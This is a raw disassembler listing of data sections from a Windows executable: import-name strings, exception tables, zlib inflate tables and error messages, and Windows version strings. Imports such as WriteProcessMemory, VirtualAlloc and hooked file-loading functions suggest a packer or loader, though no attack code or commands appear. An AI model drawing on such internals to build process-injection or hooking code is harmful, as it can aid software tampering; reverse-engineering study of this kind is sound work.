dword_4DE540 dd 0FFFFFFFFh, 4D8BFBh, 4D8BFFh, 0 ; DATA XREF: sub_4D8A16+5�o
dword_4DE550 dd 0FFFFFFFFh, 4D8FE0h, 4D8FE4h, 0 ; DATA XREF: sub_4D8EF3+5�o
dword_4DE560 dd 0FFFFFFFFh, 4D922Ch, 4D9230h, 0FFFFFFFFh, 4D92A5h, 4D92A9h
; DATA XREF: sub_4D918E+5�o
dword_4DE578 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D9518+5�o
dd offset loc_4D9615
align 8
dword_4DE588 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D9638+5�o
dd offset sub_4D9696
align 8
dword_4DE598 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D9789+5�o
dd offset loc_4D989D
align 8
dword_4DE5A8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4D98C0+5�o
dd offset loc_4D99A2
dword_4DE5B4 dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0 ; DATA XREF: sub_4D9DD4+FB�o
; sub_4D9DD4+15F�o ...
dword_4DE5C4 dd 33696467h, 6C642E32h, 6Ch ; DATA XREF: sub_4D9DD4+10F�o
; sub_4DB23E+5�o ...
dword_4DE5D0 dd 72657375h, 642E3233h, 6C6Ch ; DATA XREF: sub_4D9DD4+123�o
dword_4DE5DC dd 33656C6Fh, 6C642E32h, 6Ch, 61766461h, 32336970h, 6C6C642Eh
; DATA XREF: sub_4D9518+C2�o
; sub_4D9789+6E�o ...
dd 0
dword_4DE5F8 dd 61656C6Fh, 32337475h, 6C6C642Eh, 0 ; DATA XREF: sub_4D99C5+30�o
; sub_4D9A34+6F�o ...
aSetunhandled_0 db 'SetUnhandledExceptionFilter',0 ; DATA XREF: _6:004E1254�o
aCreatefilea_0 db 'CreateFileA',0 ; DATA XREF: _6:004E125C�o
aCreatefilew_0 db 'CreateFileW',0 ; DATA XREF: _6:004E1264�o
aReadfile_0 db 'ReadFile',0 ; DATA XREF: _6:004E1284�o
align 4
aClosehandle_0 db 'CloseHandle',0 ; DATA XREF: _6:004E128C�o
aSetfilepoint_0 db 'SetFilePointer',0 ; DATA XREF: _6:004E1294�o
align 4
aGetfilesize_0 db 'GetFileSize',0 ; DATA XREF: _6:004E129C�o
aExitprocess_1 db 'ExitProcess',0 ; DATA XREF: _6:004E12A4�o
aCreatefilema_2 db 'CreateFileMappingA',0 ; DATA XREF: _6:004E12AC�o
align 10h
aCreatefilema_3 db 'CreateFileMappingW',0 ; DATA XREF: _6:004E12B4�o
align 4
aLoadlibrarya_0 db 'LoadLibraryA',0 ; DATA XREF: _6:004E12D4�o
align 4
aLoadlibraryw db 'LoadLibraryW',0 ; DATA XREF: _6:004E12DC�o
align 4
aLoadlibrarye_0 db 'LoadLibraryExA',0 ; DATA XREF: _6:004E12E4�o
align 4
aLoadlibraryexw db 'LoadLibraryExW',0 ; DATA XREF: _6:004E12EC�o
align 4
aFreelibrary_1 db 'FreeLibrary',0 ; DATA XREF: _6:004E12CC�o
aGetprocaddre_1 db 'GetProcAddress',0 ; DATA XREF: _6:004E12F4�o
align 10h
aLoadimagea_0 db 'LoadImageA',0 ; DATA XREF: _6:004E13DC�o
align 4
aMapviewoffil_0 db 'MapViewOfFile',0 ; DATA XREF: _6:004E12BC�o
align 4
aUnmapviewoff_1 db 'UnmapViewOfFile',0 ; DATA XREF: _6:004E12C4�o
aGetfileattri_3 db 'GetFileAttributesA',0 ; DATA XREF: _6:004E126C�o
align 10h
aGetfileattri_4 db 'GetFileAttributesW',0 ; DATA XREF: _6:004E1274�o
align 4
aGetfileattri_5 db 'GetFileAttributesExW',0 ; DATA XREF: _6:004E127C�o
align 4
aGetmodulehan_1 db 'GetModuleHandleA',0 ; DATA XREF: _6:004E1354�o
align 10h
aGetmodulehan_2 db 'GetModuleHandleW',0 ; DATA XREF: _6:004E135C�o
align 4
aGetmodulefil_1 db 'GetModuleFileNameA',0 ; DATA XREF: _6:004E13AC�o
align 4
aGetmodulefil_2 db 'GetModuleFileNameW',0 ; DATA XREF: _6:004E13B4�o
align 4
aGetlongpathn_1 db 'GetLongPathNameA',0 ; DATA XREF: _6:004E13BC�o
align 10h
aGetlongpathn_2 db 'GetLongPathNameW',0 ; DATA XREF: _6:004E13C4�o
align 4
aSearchpathw db 'SearchPathW',0 ; DATA XREF: sub_4DA226+B2�o
; _6:004E1364�o
aSearchpatha_0 db 'SearchPathA',0 ; DATA XREF: sub_4DA1C7+D�o
; _6:004E136C�o
aAddfontresou_0 db 'AddFontResourceA',0 ; DATA XREF: sub_4DB23E+A�o
; _6:004E13CC�o
align 10h
aRemovefontre_0 db 'RemoveFontResourceA',0 ; DATA XREF: sub_4DB277+A�o
; _6:004E13D4�o
aFindfirstfil_1 db 'FindFirstFileA',0 ; DATA XREF: _6:004E12FC�o
align 4
aFindfirstfilew db 'FindFirstFileW',0 ; DATA XREF: sub_4DA361+92�o
; _6:004E1304�o
align 4
aFindclose_1 db 'FindClose',0
align 10h
aFindnextfile_1 db 'FindNextFileA',0 ; DATA XREF: _6:004E131C�o
align 10h
aFindnextfilew db 'FindNextFileW',0 ; DATA XREF: sub_4DA657+2E�o
; _6:004E1324�o
align 10h
aFindfirstfilee db 'FindFirstFileExW',0 ; DATA XREF: sub_4DA4AA+92�o
; _6:004E130C�o
align 4
a_lopen db '_lopen',0 ; DATA XREF: sub_4DB636+25�o
; _6:004E1334�o
align 4
aOpenfile db 'OpenFile',0 ; DATA XREF: sub_4DB582+93�o
; _6:004E132C�o
align 4
a_lread db '_lread',0 ; DATA XREF: sub_4DB711+27�o
; _6:004E1344�o
align 10h
a_llseek db '_llseek',0 ; DATA XREF: sub_4DB6CC+20�o
; _6:004E134C�o
a_lclose db '_lclose',0 ; DATA XREF: sub_4DB677+23�o
; _6:004E133C�o
aCocreateinstan db 'CoCreateInstance',0 ; DATA XREF: sub_4D9518+C7�o
; _6:004E13E4�o
align 4
aCocreateinst_0 db 'CoCreateInstanceEx',0 ; DATA XREF: sub_4D9789+73�o
; _6:004E13EC�o
align 4
aCogetclassobje db 'CoGetClassObject',0 ; DATA XREF: sub_4D98C0+AC�o
; _6:004E13F4�o
align 4
aGetprivatepr_2 db 'GetPrivateProfileStringA',0 ; DATA XREF: _6:004E1374�o
align 4
aGetprivatepr_3 db 'GetPrivateProfileIntA',0 ; DATA XREF: _6:004E137C�o
align 10h
aGetprivatepr_4 db 'GetPrivateProfileSectionNamesA',0 ; DATA XREF: _6:004E1384�o
align 10h
aGetprivatepr_5 db 'GetPrivateProfileSectionA',0 ; DATA XREF: _6:004E138C�o
align 4
aGetfileinfor_0 db 'GetFileInformationByHandle',0 ; DATA XREF: _6:004E1394�o
align 4
aLockfile_0 db 'LockFile',0 ; DATA XREF: _6:004E139C�o
align 4
aLockfileex db 'LockFileEx',0
align 10h
aUnlockfile_0 db 'UnlockFile',0 ; DATA XREF: _6:004E13A4�o
align 4
aUnlockfileex db 'UnlockFileEx',0
align 4
aGetrecordinf_0 db 'GetRecordInfoFromGuids',0 ; DATA XREF: sub_4D9A34+D2�o
; _6:004E13FC�o
align 4
aGetrecordinfof db 'GetRecordInfoFromTypeInfo',0 ; DATA XREF: sub_4D99C5+35�o
align 10h
aLoadregtypelib db 'LoadRegTypeLib',0 ; DATA XREF: sub_4D9B3C+84�o
; _6:004E1404�o
align 10h
aLoadtypelib db 'LoadTypeLib',0 ; DATA XREF: sub_4D9A34+74�o
; sub_4D9B3C+4F�o
align 10h
dword_4DEA00 dd 0FFFFFFFFh, 4DA115h, 4DA119h, 0FFFFFFFFh, 4DA129h, 4DA12Dh
; DATA XREF: sub_4DA0C8+5�o
dd 0FFFFFFFFh, 4DA14Ah, 4DA14Eh, 0FFFFFFFFh, 4DA15Eh, 4DA162h
dd 0FFFFFFFFh, 4DA183h, 4DA187h, 0FFFFFFFFh, 4DA197h, 4DA19Bh
dword_4DEA48 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4DA226+5�o
dd offset loc_4DA311
align 8
dword_4DEA58 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4DA361+5�o
dd offset sub_4DA480
align 8
dword_4DEA68 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4DA4AA+5�o
dd offset sub_4DA5D5
align 8
dword_4DEA78 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4DA7DD+5�o
dd offset sub_4DA886
align 8
dword_4DEA88 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4DA8AA+5�o
dd offset sub_4DA9C8
align 8
dword_4DEA98 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4DAB3D+5�o
dd offset sub_4DAC33
align 8
dword_4DEAA8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4DAEAA+5�o
dd offset loc_4DAF44
align 8
dword_4DEAB8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4DAFC6+5�o
dd offset sub_4DB052
align 8
dword_4DEAC8 dd 0FFFFFFFFh, 4DB0E2h, 4DB0E6h, 0FFFFFFFFh, 0 ; DATA XREF: sub_4DB076+5�o
dd offset sub_4DB15D
dword_4DEAE0 dd 0FFFFFFFFh, 4DB1C4h, 4DB1C8h, 0 ; DATA XREF: sub_4DB18D+5�o
dword_4DEAF0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4DB2FE+5�o
dd offset sub_4DB3B1
dword_4DEAFC dd 0 ; DATA XREF: sub_4CCA80+57�o
; sub_4CCDBF+52�o
dword_4DEB00 dd 2 dup(0) ; DATA XREF: sub_4CCA80+36�o
; sub_4CCDBF+39�o
dword_4DEB08 dd 0FFFFFFFFh, 4CCB90h, 4CCB94h, 0FFFFFFFFh, 4CCC44h, 4CCC48h
; DATA XREF: sub_4CCA80+5�o
dword_4DEB20 dd 0FFFFFFFFh, 4CCEB8h, 4CCEBCh, 0DEB68h, 2 dup(0)
; DATA XREF: sub_4CCDBF+5�o
dd 0DECB8h, 0DE000h, 0DEBB8h, 2 dup(0)
dd 0DECEEh, 0DE050h, 5 dup(0)
dd 0DEBC4h, 0DEBE0h, 0DEBF2h, 0DEBFEh, 0DEC10h, 0DEC1Eh
dd 0DEC32h, 0DEC4Ah, 0DEC62h, 0DEC76h, 0DEC86h, 0DEC9Ch
dd 0DED52h, 0DED42h, 0DED32h, 0DECFAh, 0DED06h, 0DED1Ch
dd 0DED64h, 0
dd 0DECC6h, 0DECD8h, 0
db 19h
db 2, 49h, 6Eh
aItializecritic db 'itializeCriticalSection',0
dd 65470198h, 6F725074h, 64644163h, 73736572h, 2520000h
dd 61636F4Ch, 6572466Ch, 29B0065h, 73696152h, 63784565h
dd 69747065h, 6E6Fh, 6F4C024Eh, 416C6163h, 636F6C6Ch, 1770000h
dd 4D746547h, 6C75646Fh, 6E614865h, 41656C64h, 2470000h
aLeavecritica_1 db 'LeaveCriticalSection',0
align 2
aP_0 db '',0
aEntercritica_1 db 'EnterCriticalSection',0
align 2
dw 1ADh
aGetshortpathna db 'GetShortPathNameA',0
dw 2C5h
aResumethread db 'ResumeThread',0
align 2
dw 39Dh
aWriteprocessme db 'WriteProcessMemory',0
align 4
db 90h
db 1, 47h, 65h
aTprivateprofil db 'tPrivateProfileSectionA',0
aKernel32_dll_2 db 'KERNEL32.dll',0
align 2
aO db '',0
aDefwindowpro_0 db 'DefWindowProcA',0
align 4
db 2
align 2
aAdjustwindowre db 'AdjustWindowRectEx',0
align 2
aUser32_dll_1 db 'USER32.dll',0
align 2
retf 5202h
; ---------------------------------------------------------------------------
aTlunwind db 'tlUnwind',0
dw 387h
aWidechartomu_0 db 'WideCharToMultiByte',0
db 6Bh ; k
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 23Ah
aLcmapstringa db 'LCMapStringA',0
align 2
dw 23Bh
aLcmapstringw db 'LCMapStringW',0
align 2
dw 1B2h
aGetstringtypea db 'GetStringTypeA',0
align 4
dd 654701B5h, 72745374h, 54676E69h, 57657079h
db 2 dup(0)
_5 ends
; Section 7. (virtual address 000DF000)
; Virtual size : 00007110 ( 28944.)
; Section size in file : 00007110 ( 28944.)
; Offset to raw data for section: 000DF000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_6 segment para public 'CODE' use32
assume cs:_6
;org 4DF000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
aInvalidBitLeng db 'invalid bit length repeat',0 ; DATA XREF: sub_4DBC4B+81D�o
align 4
aTooManyLengthO db 'too many length or distance symbols',0 ; DATA XREF: sub_4DBC4B+783�o
aInvalidStoredB db 'invalid stored block lengths',0 ; DATA XREF: sub_4DBC4B+6CC�o
align 10h
aInvalidBlockTy db 'invalid block type',0 ; DATA XREF: sub_4DBC4B+66B�o
align 4
aInvalidDistanc db 'invalid distance code',0 ; DATA XREF: sub_4DC61A+4BB�o
; sub_4DCBEB+23E�o
align 4
aInvalidLiteral db 'invalid literal/length code',0 ; DATA XREF: sub_4DC61A+486�o
; sub_4DCBEB+28D�o
byte_4DF0A8 db 31h ; DATA XREF: sub_4DCF41+15�r
; sub_4DD9F3+2F�o
db 2Eh, 31h, 2Eh
dd 34h
aNeedDictionary db 'need dictionary',0 ; DATA XREF: sub_4DD043+307�o
aIncorrectDataC db 'incorrect data check',0 ; DATA XREF: sub_4DD043+230�o
align 4
aIncorrectHeade db 'incorrect header check',0 ; DATA XREF: sub_4DD043+EC�o
align 10h
aInvalidWindowS db 'invalid window size',0 ; DATA XREF: sub_4DD043+9C�o
aUnknownCompres db 'unknown compression method',0 ; DATA XREF: sub_4DD043+79�o
align 10h
dword_4DF120 dd 9 ; DATA XREF: sub_4DD8AF+6�r
dword_4DF124 dd 5 ; DATA XREF: sub_4DD8AF+11�r
dword_4DF128 dd 760h, 100h, 800h, 50h, 800h, 10h, 854h, 73h, 752h, 1Fh
; DATA XREF: sub_4DD8AF+1C�o
dd 800h, 70h, 800h, 30h, 900h, 0C0h, 750h, 0Ah, 800h, 60h
dd 800h, 20h, 900h, 0A0h, 800h, 0
dd 800h, 80h, 800h, 40h, 900h, 0E0h, 750h, 6, 800h, 58h
dd 800h, 18h, 900h, 90h, 753h, 3Bh, 800h, 78h, 800h, 38h
dd 900h, 0D0h, 751h, 11h, 800h, 68h, 800h, 28h, 900h, 0B0h
dd 800h, 8, 800h, 88h, 800h, 48h, 900h, 0F0h, 750h, 4
dd 800h, 54h, 800h, 14h, 855h, 0E3h, 753h, 2Bh, 800h, 74h
dd 800h, 34h, 900h, 0C8h, 751h, 0Dh, 800h, 64h, 800h, 24h
dd 900h, 0A8h, 800h, 4, 800h, 84h, 800h, 44h, 900h, 0E8h
dd 750h, 8, 800h, 5Ch, 800h, 1Ch, 900h, 98h, 754h, 53h
dd 800h, 7Ch, 800h, 3Ch, 900h, 0D8h, 752h, 17h, 800h, 6Ch
dd 800h, 2Ch, 900h, 0B8h, 800h, 0Ch, 800h, 8Ch, 800h, 4Ch
dd 900h, 0F8h, 750h, 3, 800h, 52h, 800h, 12h, 855h, 0A3h
dd 753h, 23h, 800h, 72h, 800h, 32h, 900h, 0C4h, 751h, 0Bh
dd 800h, 62h, 800h, 22h, 900h, 0A4h, 800h, 2, 800h, 82h
dd 800h, 42h, 900h, 0E4h, 750h, 7, 800h, 5Ah, 800h, 1Ah
dd 900h, 94h, 754h, 43h, 800h, 7Ah, 800h, 3Ah, 900h, 0D4h
dd 752h, 13h, 800h, 6Ah, 800h, 2Ah, 900h, 0B4h, 800h, 0Ah
dd 800h, 8Ah, 800h, 4Ah, 900h, 0F4h, 750h, 5, 800h, 56h
dd 800h, 16h, 8C0h, 0
dd 753h, 33h, 800h, 76h, 800h, 36h, 900h, 0CCh, 751h, 0Fh
dd 800h, 66h, 800h, 26h, 900h, 0ACh, 800h, 6, 800h, 86h
dd 800h, 46h, 900h, 0ECh, 750h, 9, 800h, 5Eh, 800h, 1Eh
dd 900h, 9Ch, 754h, 63h, 800h, 7Eh, 800h, 3Eh, 900h, 0DCh
dd 752h, 1Bh, 800h, 6Eh, 800h, 2Eh, 900h, 0BCh, 800h, 0Eh
dd 800h, 8Eh, 800h, 4Eh, 900h, 0FCh, 760h, 100h, 800h
dd 51h, 800h, 11h, 855h, 83h, 752h, 1Fh, 800h, 71h, 800h
dd 31h, 900h, 0C2h, 750h, 0Ah, 800h, 61h, 800h, 21h, 900h
dd 0A2h, 800h, 1, 800h, 81h, 800h, 41h, 900h, 0E2h, 750h
dd 6, 800h, 59h, 800h, 19h, 900h, 92h, 753h, 3Bh, 800h
dd 79h, 800h, 39h, 900h, 0D2h, 751h, 11h, 800h, 69h, 800h
dd 29h, 900h, 0B2h, 800h, 9, 800h, 89h, 800h, 49h, 900h
dd 0F2h, 750h, 4, 800h, 55h, 800h, 15h, 850h, 102h, 753h
dd 2Bh, 800h, 75h, 800h, 35h, 900h, 0CAh, 751h, 0Dh, 800h
dd 65h, 800h, 25h, 900h, 0AAh, 800h, 5, 800h, 85h, 800h
dd 45h, 900h, 0EAh, 750h, 8, 800h, 5Dh, 800h, 1Dh, 900h
dd 9Ah, 754h, 53h, 800h, 7Dh, 800h, 3Dh, 900h, 0DAh, 752h
dd 17h, 800h, 6Dh, 800h, 2Dh, 900h, 0BAh, 800h, 0Dh, 800h
dd 8Dh, 800h, 4Dh, 900h, 0FAh, 750h, 3, 800h, 53h, 800h
dd 13h, 855h, 0C3h, 753h, 23h, 800h, 73h, 800h, 33h, 900h
dd 0C6h, 751h, 0Bh, 800h, 63h, 800h, 23h, 900h, 0A6h, 800h
dd 3, 800h, 83h, 800h, 43h, 900h, 0E6h, 750h, 7, 800h
dd 5Bh, 800h, 1Bh, 900h, 96h, 754h, 43h, 800h, 7Bh, 800h
dd 3Bh, 900h, 0D6h, 752h, 13h, 800h, 6Bh, 800h, 2Bh, 900h
dd 0B6h, 800h, 0Bh, 800h, 8Bh, 800h, 4Bh, 900h, 0F6h, 750h
dd 5, 800h, 57h, 800h, 17h, 8C0h, 0
dd 753h, 33h, 800h, 77h, 800h, 37h, 900h, 0CEh, 751h, 0Fh
dd 800h, 67h, 800h, 27h, 900h, 0AEh, 800h, 7, 800h, 87h
dd 800h, 47h, 900h, 0EEh, 750h, 9, 800h, 5Fh, 800h, 1Fh
dd 900h, 9Eh, 754h, 63h, 800h, 7Fh, 800h, 3Fh, 900h, 0DEh
dd 752h, 1Bh, 800h, 6Fh, 800h, 2Fh, 900h, 0BEh, 800h, 0Fh
dd 800h, 8Fh, 800h, 4Fh, 900h, 0FEh, 760h, 100h, 800h
dd 50h, 800h, 10h, 854h, 73h, 752h, 1Fh, 800h, 70h, 800h
dd 30h, 900h, 0C1h, 750h, 0Ah, 800h, 60h, 800h, 20h, 900h
dd 0A1h, 800h, 0
dd 800h, 80h, 800h, 40h, 900h, 0E1h, 750h, 6, 800h, 58h
dd 800h, 18h, 900h, 91h, 753h, 3Bh, 800h, 78h, 800h, 38h
dd 900h, 0D1h, 751h, 11h, 800h, 68h, 800h, 28h, 900h, 0B1h
dd 800h, 8, 800h, 88h, 800h, 48h, 900h, 0F1h, 750h, 4
dd 800h, 54h, 800h, 14h, 855h, 0E3h, 753h, 2Bh, 800h, 74h
dd 800h, 34h, 900h, 0C9h, 751h, 0Dh, 800h, 64h, 800h, 24h
dd 900h, 0A9h, 800h, 4, 800h, 84h, 800h, 44h, 900h, 0E9h
dd 750h, 8, 800h, 5Ch, 800h, 1Ch, 900h, 99h, 754h, 53h
dd 800h, 7Ch, 800h, 3Ch, 900h, 0D9h, 752h, 17h, 800h, 6Ch
dd 800h, 2Ch, 900h, 0B9h, 800h, 0Ch, 800h, 8Ch, 800h, 4Ch
dd 900h, 0F9h, 750h, 3, 800h, 52h, 800h, 12h, 855h, 0A3h
dd 753h, 23h, 800h, 72h, 800h, 32h, 900h, 0C5h, 751h, 0Bh
dd 800h, 62h, 800h, 22h, 900h, 0A5h, 800h, 2, 800h, 82h
dd 800h, 42h, 900h, 0E5h, 750h, 7, 800h, 5Ah, 800h, 1Ah
dd 900h, 95h, 754h, 43h, 800h, 7Ah, 800h, 3Ah, 900h, 0D5h
dd 752h, 13h, 800h, 6Ah, 800h, 2Ah, 900h, 0B5h, 800h, 0Ah
dd 800h, 8Ah, 800h, 4Ah, 900h, 0F5h, 750h, 5, 800h, 56h
dd 800h, 16h, 8C0h, 0
dd 753h, 33h, 800h, 76h, 800h, 36h, 900h, 0CDh, 751h, 0Fh
dd 800h, 66h, 800h, 26h, 900h, 0ADh, 800h, 6, 800h, 86h
dd 800h, 46h, 900h, 0EDh, 750h, 9, 800h, 5Eh, 800h, 1Eh
dd 900h, 9Dh, 754h, 63h, 800h, 7Eh, 800h, 3Eh, 900h, 0DDh
dd 752h, 1Bh, 800h, 6Eh, 800h, 2Eh, 900h, 0BDh, 800h, 0Eh
dd 800h, 8Eh, 800h, 4Eh, 900h, 0FDh, 760h, 100h, 800h
dd 51h, 800h, 11h, 855h, 83h, 752h, 1Fh, 800h, 71h, 800h
dd 31h, 900h, 0C3h, 750h, 0Ah, 800h, 61h, 800h, 21h, 900h
dd 0A3h, 800h, 1, 800h, 81h, 800h, 41h, 900h, 0E3h, 750h
dd 6, 800h, 59h, 800h, 19h, 900h, 93h, 753h, 3Bh, 800h
dd 79h, 800h, 39h, 900h, 0D3h, 751h, 11h, 800h, 69h, 800h
dd 29h, 900h, 0B3h, 800h, 9, 800h, 89h, 800h, 49h, 900h
dd 0F3h, 750h, 4, 800h, 55h, 800h, 15h, 850h, 102h, 753h
dd 2Bh, 800h, 75h, 800h, 35h, 900h, 0CBh, 751h, 0Dh, 800h
dd 65h, 800h, 25h, 900h, 0ABh, 800h, 5, 800h, 85h, 800h
dd 45h, 900h, 0EBh, 750h, 8, 800h, 5Dh, 800h, 1Dh, 900h
dd 9Bh, 754h, 53h, 800h, 7Dh, 800h, 3Dh, 900h, 0DBh, 752h
dd 17h, 800h, 6Dh, 800h, 2Dh, 900h, 0BBh, 800h, 0Dh, 800h
dd 8Dh, 800h, 4Dh, 900h, 0FBh, 750h, 3, 800h, 53h, 800h
dd 13h, 855h, 0C3h, 753h, 23h, 800h, 73h, 800h, 33h, 900h
dd 0C7h, 751h, 0Bh, 800h, 63h, 800h, 23h, 900h, 0A7h, 800h
dd 3, 800h, 83h, 800h, 43h, 900h, 0E7h, 750h, 7, 800h
dd 5Bh, 800h, 1Bh, 900h, 97h, 754h, 43h, 800h, 7Bh, 800h
dd 3Bh, 900h, 0D7h, 752h, 13h, 800h, 6Bh, 800h, 2Bh, 900h
dd 0B7h, 800h, 0Bh, 800h, 8Bh, 800h, 4Bh, 900h, 0F7h, 750h
dd 5, 800h, 57h, 800h, 17h, 8C0h, 0
dd 753h, 33h, 800h, 77h, 800h, 37h, 900h, 0CFh, 751h, 0Fh
dd 800h, 67h, 800h, 27h, 900h, 0AFh, 800h, 7, 800h, 87h
dd 800h, 47h, 900h, 0EFh, 750h, 9, 800h, 5Fh, 800h, 1Fh
dd 900h, 9Fh, 754h, 63h, 800h, 7Fh, 800h, 3Fh, 900h, 0DFh
dd 752h, 1Bh, 800h, 6Fh, 800h, 2Fh, 900h, 0BFh, 800h, 0Fh
dd 800h, 8Fh, 800h, 4Fh, 900h, 0FFh
dword_4E0128 dd 550h, 1, 557h, 101h, 553h, 11h, 55Bh, 1001h, 551h, 5
; DATA XREF: sub_4DD8AF+25�o
dd 559h, 401h, 555h, 41h, 55Dh, 4001h, 550h, 3, 558h, 201h
dd 554h, 21h, 55Ch, 2001h, 552h, 9, 55Ah, 801h, 556h, 81h
dd 5C0h, 6001h, 550h, 2, 557h, 181h, 553h, 19h, 55Bh, 1801h
dd 551h, 7, 559h, 601h, 555h, 61h, 55Dh, 6001h, 550h, 4
dd 558h, 301h, 554h, 31h, 55Ch, 3001h, 552h, 0Dh, 55Ah
dd 0C01h, 556h, 0C1h, 5C0h, 6001h
aIncompleteDyna db 'incomplete dynamic bit lengths tree',0 ; DATA XREF: sub_4DD3A6+66�o
aOversubscribed db 'oversubscribed dynamic bit lengths tree',0 ; DATA XREF: sub_4DD3A6+4E�o
aIncompleteLite db 'incomplete literal/length tree',0 ; DATA XREF: sub_4DD7AC:loc_4DD891�o
align 4
aOversubscrib_1 db 'oversubscribed literal/length tree',0 ; DATA XREF: sub_4DD7AC+D7�o
align 4
aEmptyDistanceT db 'empty distance tree with lengths',0 ; DATA XREF: sub_4DD7AC:loc_4DD875�o
align 4
aIncompleteDist db 'incomplete distance tree',0 ; DATA XREF: sub_4DD7AC+BB�o
align 4
aOversubscrib_0 db 'oversubscribed distance tree',0 ; DATA XREF: sub_4DD7AC+AD�o
align 4
dword_4E0318 dd 0 ; DATA XREF: sub_4DBC4B:loc_4DC07F�r
; sub_4DBC4B+4C0�r ...
dd 1, 3, 7, 0Fh, 1Fh, 3Fh, 7Fh, 0FFh, 1FFh, 3FFh, 7FFh
dd 0FFFh, 1FFFh, 3FFFh, 7FFFh, 0FFFFh
aGetcurrentproc db 'GetCurrentProcess',0 ; DATA XREF: sub_4CD2E0+1E4�o
; sub_4CE2E0+16B�o
align 10h
aFlushinstructi db 'FlushInstructionCache',0 ; DATA XREF: sub_4CD2E0:loc_4CD4B0�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_4CD2E0+1AB�o
; sub_4CDDD0+1D�o ...
align 4
aBarier db 'BARIER',0 ; DATA XREF: sub_4CD2E0+4C�o
align 10h
aWindowsntUnkno db 'WindowsNT(unknown)',0 ; DATA XREF: _4:loc_4CE1D5�o
; _4:loc_4CE1E1�o
align 4
aWindows_net db 'Windows.NET',0 ; DATA XREF: _4:004CE1C9�o
aWindowsxp db 'WindowsXP',0 ; DATA XREF: _4:004CE1B1�o
align 4
aWindows2000 db 'Windows2000',0 ; DATA XREF: _4:004CE199�o
aWindowsnt4_0 db 'WindowsNT(4.0)',0 ; DATA XREF: _4:004CE175�o
align 4
aWindowsnt3_51 db 'WindowsNT(3.51)',0 ; DATA XREF: _4:004CE15A�o
aWindows9xUnkno db 'Windows9x(unknown)',0 ; DATA XREF: _4:loc_4CE13F�o
align 4
aWindowsme db 'WindowsMe',0 ; DATA XREF: _4:004CE133�o
align 4
aWindows98 db 'Windows98',0 ; DATA XREF: _4:004CE11B�o
align 4
aWindows95 db 'Windows95',0 ; DATA XREF: _4:004CE103�o
align 10h
aWin32s db 'win32s',0 ; DATA XREF: _4:loc_4CE0E8�o
align 4
aVirtualalloc db 'VirtualAlloc',0 ; DATA XREF: _4:loc_4CDE99�o
; sub_4CE2E0+52B�o
align 4
aCreatethread db 'CreateThread',0 ; DATA XREF: sub_4CE2E0+86D�o
align 4
aPostmessagea db 'PostMessageA',0 ; DATA XREF: sub_4CE2E0+859�o
align 4
aDefwindowproca db 'DefWindowProcA',0 ; DATA XREF: sub_4CE2E0+845�o
align 4
aEnumwindows db 'EnumWindows',0 ; DATA XREF: sub_4CE2E0+831�o
aDestroywindo_0 db 'DestroyWindow',0 ; DATA XREF: sub_4CE2E0+81D�o
align 4
aDispatchmessag db 'DispatchMessageA',0 ; DATA XREF: sub_4CE2E0+809�o
align 4
aTranslatemessa db 'TranslateMessage',0 ; DATA XREF: sub_4CE2E0+7F5�o
align 4
aGetmessagea db 'GetMessageA',0 ; DATA XREF: sub_4CE2E0+7E1�o
aCreatewindowex db 'CreateWindowExA',0 ; DATA XREF: sub_4CE2E0+7CD�o
aGetsystemmetri db 'GetSystemMetrics',0 ; DATA XREF: sub_4CE2E0+7B9�o
align 4
aRegisterclasse db 'RegisterClassExA',0 ; DATA XREF: sub_4CE2E0+7A5�o
align 10h
aSetforegroundw db 'SetForegroundWindow',0 ; DATA XREF: sub_4CE2E0+791�o
aSetactivewindo db 'SetActiveWindow',0 ; DATA XREF: sub_4CE2E0+77D�o
aGetwindowthrea db 'GetWindowThreadProcessId',0 ; DATA XREF: sub_4CE2E0+769�o
align 10h
aBitblt_0 db 'BitBlt',0 ; DATA XREF: sub_4CE2E0+755�o
align 4
aDeleteobject_0 db 'DeleteObject',0 ; DATA XREF: sub_4CE2E0+741�o
align 4
aSelectobject_0 db 'SelectObject',0 ; DATA XREF: sub_4CE2E0+72D�o
align 4
aGetobjecta db 'GetObjectA',0 ; DATA XREF: sub_4CE2E0+719�o
align 4
aEndpaint db 'EndPaint',0 ; DATA XREF: sub_4CE2E0+705�o
align 10h
aBeginpaint db 'BeginPaint',0 ; DATA XREF: sub_4CE2E0+6F1�o
align 4
aRemovefontreso db 'RemoveFontResourceA',0 ; DATA XREF: sub_4CE2E0+6DD�o
aDeletedc_0 db 'DeleteDC',0 ; DATA XREF: sub_4CE2E0+6C9�o
align 4
aCreatedibsec_0 db 'CreateDIBSection',0 ; DATA XREF: sub_4CE2E0+6B5�o
align 10h
aCreatecompat_0 db 'CreateCompatibleDC',0 ; DATA XREF: sub_4CE2E0+6A1�o
align 4
aAddfontresourc db 'AddFontResourceA',0 ; DATA XREF: sub_4CE2E0:loc_4CE96D�o
align 4
aGdi32_dll_0 db 'gdi32.dll',0 ; DATA XREF: sub_4CE2E0+668�o
align 4
aWvsprintfa db 'wvsprintfA',0 ; DATA XREF: sub_4CE2E0+654�o
align 10h
aWsprintfa db 'wsprintfA',0 ; DATA XREF: sub_4CE2E0+640�o
align 4
aMessageboxa_0 db 'MessageBoxA',0 ; DATA XREF: sub_4CE2E0+62C�o
aLoadimagea db 'LoadImageA',0 ; DATA XREF: sub_4CE2E0+618�o
align 4
aCharupperbuffa db 'CharUpperBuffA',0 ; DATA XREF: sub_4CE2E0+604�o
align 4
